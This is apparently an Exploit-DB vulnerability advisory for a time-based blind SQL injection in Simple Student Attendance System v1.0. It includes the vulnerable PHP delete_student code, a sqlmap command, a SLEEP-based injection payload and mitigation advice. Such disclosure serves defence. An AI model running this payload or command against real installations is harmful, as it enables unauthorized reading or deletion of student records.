Simple Student Attendance System - Time Based Blind SQL Injection

vendor:

Simple Student Attendance System

by:

Gnanaraj Mauviel

6.1

CVSS

HIGH

Time Based Blind SQL Injection

CWE

Product Name: Simple Student Attendance System

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE:

CPE: a:oretnom23:simple_student_attendance_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Mac OSX, XAMPP, Apache, MySQL

2023

Simple Student Attendance System – Time Based Blind SQL Injection

The Simple Student Attendance System v1.0 is vulnerable to a Time Based Blind SQL Injection. An attacker can exploit this vulnerability by sending a crafted POST request with a malicious payload to the 'id' parameter in the delete_student function of the actions.class.php file. This allows the attacker to perform unauthorized SQL queries, potentially leading to data leakage or manipulation. This exploit has been tested using sqlmap tool.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented in the application to prevent SQL injection attacks. Additionally, limiting database user privileges and regular security testing can help protect against such exploits.

Source

Exploit-DB raw data:

# Exploit Title: Simple Student Attendance System - Time Based Blind SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(/php-attendance/classes/actions.class.php):

public function delete_student(){
extract($_POST);
$delete = $this->conn->query("DELETE FROM `students_tbl` where `id` = '{$id}'");
if($delete){
$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Student has been deleted successfully!" ];
return [ "status" => "success" ];
}else{
$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Student has failed to deleted due to unknown reason!" ];
return [ "status" => "error", "Student has failed to deleted!" ];
}
}

-> sqlmap -u "http://localhost/php-attendance/ajax-api.php?action=delete_student" --data="id=7" --technique=T --batch
---
Parameter: id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=7' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))kVAW) AND 'vAFW'='vAFW
---